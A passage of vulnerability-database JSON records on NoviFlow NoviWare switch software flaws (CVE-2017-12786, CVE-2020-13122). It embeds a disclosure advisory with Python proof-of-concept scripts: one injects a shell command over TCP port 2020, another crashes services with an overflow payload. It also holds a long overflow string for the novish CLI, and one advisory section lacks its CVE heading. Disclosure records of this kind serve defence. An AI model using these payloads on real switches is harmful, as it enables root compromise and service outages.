        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data. NoviWare Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NoviFlowNoviWare and NoviSwitchdevices are products of NoviFlow Canada. NoviSwitchdevices is a series of switch devices. NoviWare is the switch software used in it. A stack buffer overflow vulnerability exists in the NoviFlowNoviWareNW400.2.6 and earlier versions and the Network interface for the cliengine and noviengine services in the NoviSwitch device. A remote attacker could exploit the vulnerability to execute code with root privileges. NoviFlow NoviWare \u003c= NW400.2.6 multiple vulnerabilities\n\n\nIntroduction\n==========\nNoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant\nswitch software developed by NoviFlow and available for license to\nnetwork equipment manufacturers. \nMultiple vulnerabilities were identified in the NoviWare software\ndeployed on NoviSwitch devices. 
\n\n\nCVEs\n=====\n* CVE-2017-12784: remote code execution in novi_process_manager_daemon\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n* CVE-2017-12785: cli breakout in novish\nIndicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)\n\n* CVE-2017-12786: remote code execution in noviengine and cliengine\nIndicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\n\n\nAffected versions\n==============\nNoviWare \u003c= NW400.2.6 and devices where a vulnerable NoviWare version\nis deployed\n\n\nAuthor\n======\nFranASSois Goichon - Google Security Team\n\n\nCVE-2017-12784\n==============\nRemote code execution in novi_process_manager_daemon\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to two distinct\nbugs which could potentially allow a remote, unauthenticated attacker\nto gain privileged (root) code execution on the switch device. \n- A flaw when applying ACL changes requested from the CLI could expose\nthe novi_process_manager_daemon network service\n- This network service is prone to command injection and a stack-based\nbuffer overflow\n\nReproduction\n------------------\nIf TCP port 2020 is accepting connections from the network, the\nfollowing python script can be used to ping yourself on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, 2020))\n\npayload = pack(\"\u003cI\", 0xffffffff).ljust(0x24) + \"ping \u003cyour ip\u003e; echo\\x00\"\ns.sendall(pack(\"\u003cII\", 1, len(payload)+8))\ns.sendall(payload)\n\ns.close()\n---\n\nOn vulnerable versions, the appliance will perform an ICMP request to\nthe specified IP, which can be observed in network logs. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. 
\n\n\nCVE-2017-12785\n==============\nCli breakout in novish\n\nSummary\n-------------\nThe NoviWare switching software distribution is prone to a buffer\noverflow and a command injection, allowing authenticated,\nlow-privileged users to break out of the CLI and execute commands as\nroot. \n\nReproduction\n------------------\nLog in to the appliance via SSH and run the following command from the CLI:\n--\nnoviswitch# show log cli username\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n--\n\nIf the appliance is vulnerable, the cli crashes and the session ends. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. \n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n- A flaw when applying ACL changes requested from the CLI could expose\nnoviengine and cliengine network services\n- These network services are prone to a stack-based buffer overflow\nwhen unpacking serialized values. \n\nReproduction\n------------------\nIf TCP ports 9090 or 12345 are accepting connections from the network,\nthe following python script can be used to cause a crash on vulnerable\nversions :\n---\nfrom struct import pack\nimport socket\n\ns = socket.socket()\ns.connect((\u003cswitch host\u003e, \u003c9090 or 12345\u003e))\n\npayload = \"\".join([pack(\"\u003cI\", 4) + \"AAAA\" for i in xrange(408)])\npayload = pack(\"\u003cIIQ\", 0, len(payload) + 16, 0) + payload\ns.sendall(payload)\n\ns.read(1)\ns.close()\n---\n\nA watchdog should restart the service if it has crashed. \n\nRemediation\n-----------------\n- Upgrade to NoviWare400 3.0 or later. 
\n- NoviFlow customers should have received instructions on how to get\nthe latest release along with release notes. For more information,\ncontact support@noviflow.com. \n\n\nDisclosure timeline\n===============\n2017/05/11 - Report sent to NoviFlow\n2017/05/26 - Bugs acknowledged and remediation timeline confirmed\n2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities\n2017/08/09 - CVE requests\n2017/08/16 - Public disclosure\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-12786"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12786"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=42518",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-12786",
        "trust": 3.2
      },
      {
        "db": "EXPLOIT-DB",
        "id": "42518",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314",
        "trust": 0.8
      },
      {
        "db": "EXPLOITDB",
        "id": "42518",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12786",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "143818",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12786"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "id": "VAR-201708-1146",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      }
    ],
    "trust": 0.92692307
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      }
    ]
  },
  "last_update_date": "2025-04-20T23:04:26.261000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NoviWare",
        "trust": 0.8,
        "url": "https://noviflow.com/products/noviware/"
      },
      {
        "title": "Patch for NoviFlowNoviWare and NoviSwitch Device Stack Buffer Overflow Vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/103389"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "https://www.exploit-db.com/exploits/42518/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12786"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12786"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12787"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12785"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12786"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-12786"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "date": "2017-08-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12786"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "date": "2017-08-18T23:44:44",
        "db": "PACKETSTORM",
        "id": "143818"
      },
      {
        "date": "2017-08-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      },
      {
        "date": "2017-08-22T17:29:00.240000",
        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-29532"
      },
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-12786"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      },
      {
        "date": "2017-08-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      },
      {
        "date": "2025-04-20T01:37:25.860000",
        "db": "NVD",
        "id": "CVE-2017-12786"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NoviWare Buffer error vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-007314"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201708-458"
      }
    ],
    "trust": 0.6
  }
}

VAR-202008-0023

Vulnerability from variot - Updated: 2024-11-23 22:21

The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system. NoviFlow NoviWare contains an OS command injection vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS).

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202008-0023",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "noviware",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "noviflow",
        "version": "nw500.2.12"
      },
      {
        "model": "noviware",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "noviflow",
        "version": "nw500.2.12"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:noviflow:noviware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      }
    ]
  },
  "cve": "CVE-2020-13122",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CVE-2020-13122",
            "impactScore": 8.5,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.0,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 8.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-009600",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2020-13122",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-009600",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-13122",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-009600",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202008-854",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system. NoviFlow NoviWare To OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-13122"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-13122",
        "trust": 2.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "id": "VAR-202008-0023",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.32692307
  },
  "last_update_date": "2024-11-23T22:21:04.502000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NoviWare",
        "trust": 0.8,
        "url": "https://noviflow.com/noviware/"
      },
      {
        "title": "NoviFlow NoviWare NW500 Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=126541"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://drive.google.com/file/d/1il4cc0zbqk9s190dbfqd7mwybbh-vljb/view?usp=sharing"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13122"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-13122"
      },
      {
        "trust": 0.8,
        "url": "https://drive.google.com/file/d/1il4cc0zbqk9s190dbfqd7mwybbh-vljb/view"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-11-20T06:26:58",
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "date": "2020-08-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      },
      {
        "date": "2020-08-17T16:15:13.107000",
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-11-20T06:26:58",
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      },
      {
        "date": "2021-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      },
      {
        "date": "2024-11-21T05:00:42.163000",
        "db": "NVD",
        "id": "CVE-2020-13122"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NoviFlow NoviWare In  OS Command injection vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-009600"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202008-854"
      }
    ],
    "trust": 0.6
  }
}

CVE-2020-13122 (GCVE-0-2020-13122)

Vulnerability from nvd – Published: 2020-08-17 15:59 – Updated: 2024-08-04 12:11
Summary
The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T12:11:18.611Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2020-06-17T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-08-17T15:59:25",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-13122",
          "STATE": "PUBLIC"
        },
